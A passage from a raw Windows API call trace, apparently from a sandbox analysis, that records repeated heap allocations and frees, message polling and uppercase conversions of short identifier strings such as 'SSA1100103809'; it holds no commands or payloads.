Size=0x20) returned 0x2a782f0 [0209.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0209.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0209.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0209.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0209.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0209.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0209.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0209.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0209.478] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0209.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0209.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0209.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0209.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0209.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0209.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0209.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0209.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0209.478] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0209.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0209.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0209.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0209.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0209.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0209.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0209.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0209.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0209.479] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0209.479] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0209.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0209.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0209.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0209.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0209.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0209.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0209.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0209.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0209.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0209.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0209.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0209.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0209.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0209.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0209.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0209.479] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0209.479] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0209.479] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0209.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0209.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0209.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0209.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0209.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0209.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0209.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0209.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0209.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0209.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0209.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0209.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0209.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0209.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0209.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0209.480] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0209.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0209.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0209.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0209.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0209.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0209.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0209.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0209.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0209.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0209.480] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0209.480] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0209.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0209.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0209.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0209.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0209.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0209.481] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0209.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0209.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0209.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0209.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0209.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0209.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c28 [0209.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0209.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0209.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0209.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0209.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0209.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0209.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0209.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0209.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0209.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0209.481] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0209.481] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0209.481] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0209.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0209.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0209.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0209.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d38 [0209.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0209.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0209.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0209.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0209.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0209.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0209.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0209.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0209.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0209.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0209.482] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0209.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0209.482] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0209.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0209.482] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0209.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaa80 [0209.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0209.482] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0209.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0209.482] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0209.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0209.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0209.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0209.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0209.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71be8 [0209.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0209.483] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0209.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0209.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0209.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0209.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0209.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0209.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0209.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0209.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0209.483] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0209.483] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0209.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0209.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c58 [0209.483] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0209.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0209.483] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0209.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf90 [0209.483] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a742c8 [0209.483] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0209.484] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0209.484] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ce8 [0209.484] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0209.484] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0209.484] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0209.484] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0209.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0209.484] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d48 [0209.484] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0209.484] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0209.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0209.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0209.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0209.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0209.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0209.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0209.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0209.484] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0209.484] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0209.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0209.484] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0209.484] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0209.484] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0209.484] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0209.484] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0209.484] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0209.484] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0209.484] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0209.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0209.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0209.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0209.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0209.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0209.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a742c8 | out: hHeap=0x2af0000) returned 1 [0209.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0209.485] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0209.485] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7080 [0209.485] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0209.485] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0209.485] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0209.485] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0209.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0209.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0209.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0209.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0209.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7080 | out: hHeap=0x2af0000) returned 1 [0209.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0209.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0209.485] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0209.485] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.485] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0209.485] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.485] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0209.485] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0209.485] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0209.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0209.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0209.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab008 [0209.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73980 [0209.486] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0209.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0209.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0209.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0209.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0209.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0209.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0209.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c38 [0209.486] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0209.486] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0209.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0209.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0209.486] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 